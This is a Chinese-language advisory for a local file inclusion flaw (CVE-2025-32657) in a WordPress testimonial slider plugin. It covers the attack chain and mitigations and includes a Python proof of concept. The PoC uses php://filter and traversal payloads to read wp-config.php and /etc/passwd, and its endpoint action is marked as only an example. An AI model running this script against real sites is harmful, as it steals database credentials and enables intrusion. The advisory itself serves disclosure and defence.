CVE-2025-32657：WordPress Testimonial Slider插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-32657

漏洞类型

PHP本地文件包含（LFI）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

RadiusTheme Testimonial Slider And Showcase Pro（WordPress插件）

漏洞概述

CVE-2025-32657是RadiusTheme公司开发的WordPress插件Testimonial Slider And Showcase Pro中存在的一个高危安全漏洞。该漏洞属于PHP本地文件包含（Local File Inclusion，LFI）漏洞类别，具体表现为对PHP程序中include/require语句所引用的文件名缺乏有效控制，导致攻击者可以通过构造特殊的请求参数，操控服务器端的文件包含操作，从而读取或执行服务器上的任意文件。

该漏洞由Patchstack安全团队（[email protected]）发现，并于2025年10月22日正式披露。根据CVSS 3.1评分体系，该漏洞获得7.5分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度较高（AC:H），需要低权限认证（PR:L），无需用户交互（UI:N），对机密性、完整性和可用性均产生高影响（C:H/I:H/A:H）。

此漏洞影响Testimonial Slider And Showcase Pro插件从n/a到2.1.7（含）的所有版本。由于该插件广泛用于WordPress网站以展示客户推荐和评价内容，拥有较大的用户基础，因此该漏洞的潜在影响范围较广。攻击者成功利用此漏洞后，可能导致敏感配置文件泄露、网站源代码被读取，甚至在特定条件下实现远程代码执行，严重威胁网站安全。

技术细节

该漏洞的核心问题在于插件代码中对PHP文件包含函数（如include、require、include_once、require_once）的参数处理不当。具体而言，插件在处理用户输入时，未对传入的文件路径进行充分的验证和过滤，攻击者可以通过控制文件路径参数，绕过预期的目录限制，访问服务器上的任意文件。

漏洞利用原理：
1. 插件在某些功能点（如模板加载、文件渲染或配置读取）中使用了动态文件包含机制；
2. 攻击者通过精心构造的HTTP请求，将恶意文件路径作为参数传递给include/require语句；
3. 由于缺乏路径规范化、白名单校验或目录遍历防护，服务器会执行或读取攻击者指定的文件；
4. 利用PHP的包装器（如php://filter、php://input）或目录遍历序列（../），攻击者可以读取服务器敏感文件（如wp-config.php）或执行恶意代码。

利用条件：
- 攻击者需要拥有低权限账户（如订阅者或更低权限角色）；
- 目标网站需安装并启用存在漏洞的插件版本（<= 2.1.7）；
- 无需管理员权限或用户交互即可触发。

由于CVSS向量中AC:H（攻击复杂度高），表明漏洞的实际利用可能需要特定的前置条件或绕过额外的安全机制，但一旦成功，影响后果严重。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或WPScan等工具识别目标WordPress网站是否安装了Testimonial Slider And Showcase Pro插件及其版本号。

STEP 2

步骤2：获取低权限凭证

攻击者通过注册订阅者账户或其他方式获取目标网站的低权限认证凭证。

STEP 3

步骤3：构造恶意请求

攻击者构造包含恶意文件路径的HTTP请求，利用PHP包装器（如php://filter）或目录遍历序列注入到存在漏洞的参数中。

STEP 4

步骤4：发送利用请求

通过认证后的会话发送恶意请求到存在漏洞的端点，触发服务器端的文件包含操作。

STEP 5

步骤5：读取敏感文件

服务器响应包含目标文件的内容，攻击者获取wp-config.php等敏感配置文件，可能包含数据库凭证。

STEP 6

步骤6：权限提升与持久化

利用获取的数据库凭证或其他敏感信息，攻击者可能实现管理员权限提升、网站篡改或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-32657 - Testimonial Slider And Showcase Pro LFI PoC
# Vulnerability: PHP Local File Inclusion
# Affected: Testimonial Slider And Showcase Pro <= 2.1.7

import requests

TARGET_URL = "http://target-wordpress-site.com"
# Low-privilege authenticated session cookie (subscriber or similar role)
COOKIES = {
    "wordpress_logged_in_xxx": "authenticated_session_cookie"
}

def exploit_lfi(file_path):
    """
    Exploit the Local File Inclusion vulnerability by injecting
    a malicious file path through the vulnerable parameter.
    """
    # Vulnerable endpoint typically related to template/file loading
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Payload using PHP filter wrapper to read file contents as base64
    payload = f"php://filter/convert.base64-encode/resource={file_path}"

    params = {
        "action": "testimonial_slider_load_template",  # Example action
        "template": payload  # Vulnerable parameter
    }

    try:
        response = requests.post(
            endpoint,
            data=params,
            cookies=COOKIES,
            timeout=10
        )

        if response.status_code == 200:
            import base64
            try:
                decoded = base64.b64decode(response.text).decode('utf-8', errors='ignore')
                print(f"[+] File contents of {file_path}:")
                print(decoded)
            except Exception:
                print(f"[+] Raw response:\n{response.text}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

# Example: Read WordPress configuration file
if __name__ == "__main__":
    exploit_lfi("../../../wp-config.php")
    # Other targets:
    # exploit_lfi("../../../etc/passwd")
    # exploit_lfi("wp-content/plugins/testimonial-slider-showcase-pro/test.php")

影响范围

Testimonial Slider And Showcase Pro <= 2.1.7

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）通过WordPress管理后台暂时禁用Testimonial Slider And Showcase Pro插件；2）在Web服务器层面配置规则，拦截包含目录遍历序列（../）或PHP包装器（php://）的可疑请求；3）检查服务器日志，排查是否存在异常的插件访问记录；4）限制WordPress管理目录的访问权限，仅允许可信IP地址访问；5）修改数据库密码及WordPress管理员凭证，防止利用泄露凭证进行进一步攻击。